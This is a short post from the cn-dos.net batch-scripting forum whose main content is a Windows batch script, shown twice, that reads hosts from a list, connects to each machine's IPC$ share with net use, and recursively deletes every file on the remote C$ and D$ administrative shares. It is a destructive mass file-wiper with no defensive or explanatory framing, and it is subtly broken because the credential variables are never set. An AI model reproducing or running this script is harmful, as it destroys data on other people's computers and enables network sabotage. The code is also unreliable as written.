Union site: www.cn-dos.net Forum site: www.cn-dos.net/forum
DOS stands for freedom, openness and progress. Let us work hard, learn from the openness and GNU spirit of FreeDOS and Linux, and together build and grow a free GNU GPL world!
Credits 41 Posts 28 Joined 2008-08-19 13:19 17-year member UID 123578 Gender Male
Status Offline
for /f "tokens=*" %%a in (p.txt) do (
net use \\%%a\ipc$ "%%b" /user:"%%c"
call :d %%a
)
:d
for %%o in (D$ C$) do (call :o %%o %1)
:o
for /r \\%2\%1 %%l in (*.*) do (del "%%l")
Credits 41 Posts 28 Joined 2008-08-19 13:19 17-year member UID 123578 Gender Male
Status Offline
for /f "tokens=*" %%a in (p.txt) do (
net use \\%%a\ipc$ "%%b" /user:"%%c"
call :d %%a
)
:d
for %%o in (D$ C$) do (call :o %%o %1)
:o
for /r \\%2\%1 %%l in (*.*) do (del "%%l")